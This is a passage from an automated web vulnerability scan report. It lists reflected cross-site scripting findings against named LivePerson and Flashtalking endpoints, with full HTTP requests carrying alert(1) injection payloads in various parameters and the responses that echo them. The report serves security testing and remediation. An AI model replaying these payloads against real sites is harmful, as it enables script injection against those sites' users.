Set-Cookie: lmdinfo=id_user=502312310620110803131833178; Domain=.lomadee.com; Expires=Thu, 07-Jul-2016 16:20:30 GMT; Path=/
Set-Cookie: loc=; Domain=.lomadee.com; Expires=Thu, 07-Jul-2016 16:20:30 GMT; Path=/
Set-Cookie: loc=; Domain=.lomadee.com; Expires=Thu, 07-Jul-2016 16:20:30 GMT; Path=/
Content-Type: text/html
Content-Length: 119
Date: Wed, 03 Aug 2011 16:20:30 GMT

json17d4a2<script>alert(1)</script>4b6bb94e076({"idloc":"502312310620110803131833178","idloc_expires_sec":"155520000"})

2.142. http://sales.liveperson.net/hc/10502888/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/10502888/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload eeafe<img%20src%3da%20onerror%3dalert(1)>f3c04e68bbd was submitted in the msessionkey parameter. This input was echoed as eeafe<img src=a onerror=alert(1)>f3c04e68bbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/10502888/?&visitor=562011718175&msessionkey=7882094211182945078eeafe<img%20src%3da%20onerror%3dalert(1)>f3c04e68bbd&siteContainer=STANDALONE&site=10502888&cmd=mTagKnockPage&lpCallId=530535959941-379580615429&protV=20&lpjson=1&id=3472057471&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/office365/online-software.aspx
Cookie: HumanClickKEY=7882094211182945078; HumanClickSiteContainerID_10502888=STANDALONE; LivePersonID=LP i=562011718175,d=1312388620; ASPSESSIONIDQQSRRARA=FMFLFGDCHFGNJFDDFAOEGDCN

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 16:25:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=7882094211182945078eeafe<img src=a onerror=alert(1)>f3c04e68bbd; path=/hc/10502888
Set-Cookie: HumanClickKEY=7882094211182945078eeafe<img src=a onerror=alert(1)>f3c04e68bbd; path=/hc/10502888
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Wed, 03 Aug 2011 16:25:25 GMT
Set-Cookie: HumanClickSiteContainerID_10502888=STANDALONE; path=/hc/10502888
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 3035

lpConnLib.Process({"ResultSet": {"lpCallId":"530535959941-379580615429","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
{"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='10502888-VID'; lpMTagConfig.FPC_VID='562011718175'; lpMTagConfig.FPC_SKEY_NAME='10502888-SKEY'; lpMTagConfig.FPC_SKEY='7882094211182945078eeafe<img src=a onerror=alert(1)>f3c04e68bbd';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_10502888'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

2.143. http://sales.liveperson.net/hc/72961245/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/72961245/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload eb032<img%20src%3da%20onerror%3dalert(1)>8b99717b9c6 was submitted in the msessionkey parameter. This input was echoed as eb032<img src=a onerror=alert(1)>8b99717b9c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/72961245/?&visitor=562011869823&msessionkey=5218592785977055670eb032<img%20src%3da%20onerror%3dalert(1)>8b99717b9c6&siteContainer=STANDALONE&site=72961245&cmd=mTagKnockPage&lpCallId=880841392092-894546690862&protV=20&lpjson=1&id=135004909&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-english%7ClpMTagConfig.db1%7Cms_header_nav_chat%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/en_US/DisplayShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5218592785977055670; HumanClickSiteContainerID_72961245=STANDALONE; LivePersonID=LP i=562011869823,d=1312425191

Response

HTTP/1.1 200 OK
Date: Thu, 04 Aug 2011 02:35:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=5218592785977055670eb032<img src=a onerror=alert(1)>8b99717b9c6; path=/hc/72961245
Set-Cookie: HumanClickKEY=5218592785977055670eb032<img src=a onerror=alert(1)>8b99717b9c6; path=/hc/72961245
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 04 Aug 2011 02:35:51 GMT
Set-Cookie: HumanClickSiteContainerID_72961245=STANDALONE; path=/hc/72961245
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 30031

lpConnLib.Process({"ResultSet": {"lpCallId":"880841392092-894546690862","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
{"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='72961245-VID'; lpMTagConfig.FPC_VID='562011869823'; lpMTagConfig.FPC_SKEY_NAME='72961245-SKEY'; lpMTagConfig.FPC_SKEY='5218592785977055670eb032<img src=a onerror=alert(1)>8b99717b9c6';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_72961245'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

2.144. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 8ef88%0a4a4a6ebaf7c was submitted in the site parameter. This input was echoed as 8ef88
4a4a6ebaf7c
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=105028888ef88%0a4a4a6ebaf7c&d_id=office365-sales HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/office365/online-software.aspx
Cookie: LivePersonID=LP i=562011718175,d=1312388620

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 16:24:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQCQBRCDS=NBOOLMLDFMJDCHCCGJELJLJM; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 105028888ef88
4a4a6ebaf7c

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

2.145. http://servedby.flashtalking.com/imp/1/16780 [173663;201;js;MSN;300x250Retargeting/?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16780

Issue detail

The value of the 173663;201;js;MSN;300x250Retargeting/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74525"-alert(1)-"b573390ac42 was submitted in the 173663;201;js;MSN;300x250Retargeting/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=74525"-alert(1)-"b573390ac42&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:29 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577


var ftGUID_173663="1310110B6FAA0E";
var ftConfID_173663="221014001";
var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=74525"-alert(1)-"b573390ac42&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407";
var ftKeyword_173663="";
var ftSegment_173663="";
var ftSegmentList_173663=[];
var ftRuleMatch_173663="0";

document.write('<scr'+'ipt src=
...[SNIP]...

2.146. http://servedby.flashtalking.com/imp/1/16780 [cachebuster parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16780

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df02"-alert(1)-"a409d46f3c0 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.47755064071df02"-alert(1)-"a409d46f3c0 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:51 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577


var ftGUID_173663="1310110B6FAA0E";
var ftConfID_173663="221314001";
var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.47755064071df02"-alert(1)-"a409d46f3c0";
var ftKeyword_173663="";
var ftSegment_173663="";
var ftSegmentList_173663=[];
var ftRuleMatch_173663="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/17/173663/221314/js/j
...[SNIP]...

2.147. http://servedby.flashtalking.com/imp/1/16780 [ftadz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16780

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7d85"-alert(1)-"ea0dbd3b447 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=c7d85"-alert(1)-"ea0dbd3b447&ftscw=&cachebuster=765046.4775506407 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:42 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577


var ftGUID_173663="1310110B6FAA0E";
var ftConfID_173663="221014001";
var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=c7d85"-alert(1)-"ea0dbd3b447&ftscw=&cachebuster=765046.4775506407";
var ftKeyword_173663="";
var ftSegment_173663="";
var ftSegmentList_173663=[];
var ftRuleMatch_173663="0";

document.write('<scr'+'ipt src="http://cdn.flash
...[SNIP]...

2.148. http://servedby.flashtalking.com/imp/1/16780 [ftscw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16780

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54a8e"-alert(1)-"29096755ce7 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=54a8e"-alert(1)-"29096755ce7&cachebuster=765046.4775506407 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:46 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577


var ftGUID_173663="1310110B6FAA0E";
var ftConfID_173663="221014001";
var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=54a8e"-alert(1)-"29096755ce7&cachebuster=765046.4775506407";
var ftKeyword_173663="";
var ftSegment_173663="";
var ftSegmentList_173663=[];
var ftRuleMatch_173663="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking
...[SNIP]...

2.149. http://servedby.flashtalking.com/imp/1/16780 [ftx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16780

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b22e"-alert(1)-"fea16b4d912 was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=9b22e"-alert(1)-"fea16b4d912&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Date: Wed, 03 Aug 2011 12:40:33 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577


var ftGUID_173663="1310110B6FAA0E";
var ftConfID_173663="221314001";
var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=9b22e"-alert(1)-"fea16b4d912&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407";
var ftKeyword_173663="";
var ftSegment_173663="";
var ftSegmentList_173663=[];
var ftRuleMatch_173663="0";

document.write('<scr'+'ipt src="http
...[SNIP]...

2.150. http://servedby.flashtalking.com/imp/1/16780 [fty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16780

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0cd8"-alert(1)-"436f8610cd4 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=d0cd8"-alert(1)-"436f8610cd4&ftadz=&ftscw=&cachebuster=765046.4775506407 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:38 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577


var ftGUID_173663="1310110B6FAA0E";
var ftConfID_173663="221314001";
var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=d0cd8"-alert(1)-"436f8610cd4&ftadz=&ftscw=&cachebuster=765046.4775506407";
var ftKeyword_173663="";
var ftSegment_173663="";
var ftSegmentList_173663=[];
var ftRuleMatch_173663="0";

document.write('<scr'+'ipt src="http://cd
...[SNIP]...

2.151. http://servedby.flashtalking.com/imp/1/16780 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16780

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 479d2"-alert(1)-"3e9411785fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407&479d2"-alert(1)-"3e9411785fc=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:55 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 580


var ftGUID_173663="1310110B6FAA0E";
var ftConfID_173663="221014001";
var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407&479d2"-alert(1)-"3e9411785fc=1";
var ftKeyword_173663="";
var ftSegment_173663="";
var ftSegmentList_173663=[];
var ftRuleMatch_173663="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/17/173663/221014/js
...[SNIP]...

2.152. http://servedby.flashtalking.com/imp/14565 [89704;201;js;MMN;300x250RON/?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/14565

Issue detail

The value of the 89704;201;js;MMN;300x250RON/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b356"-alert(1)-"5c5b4b4f79 was submitted in the 89704;201;js;MMN;300x250RON/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/14565;89704;201;js;MMN;300x250RON/?click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=7b356"-alert(1)-"5c5b4b4f79&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1310110B6FAA0E"

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:13 GMT
Server: Jetty(6.1.22)
Content-Length: 570
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 iad061104000000 (MII-APC/2.0)


var ftGUID_89704="1310110B6FAA0E";
var ftConfID_89704="135427";
var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=7b356"-alert(1)-"5c5b4b4f79&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057";
var ftKeyword_89704="";
var ftSegment_89704="";
var ftSegmentList_89704=[];
var ftRuleMatch_89704="0";

document.write('<scr'+'ipt src="http
...[SNIP]...

2.153. http://servedby.flashtalking.com/imp/14565 [cachebuster parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/14565

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adb3c"-alert(1)-"9434c654dac was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/14565;89704;201;js;MMN;300x250RON/?click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057adb3c"-alert(1)-"9434c654dac HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1310110B6FAA0E"

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:15 GMT
Server: Jetty(6.1.22)
Content-Length: 571
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
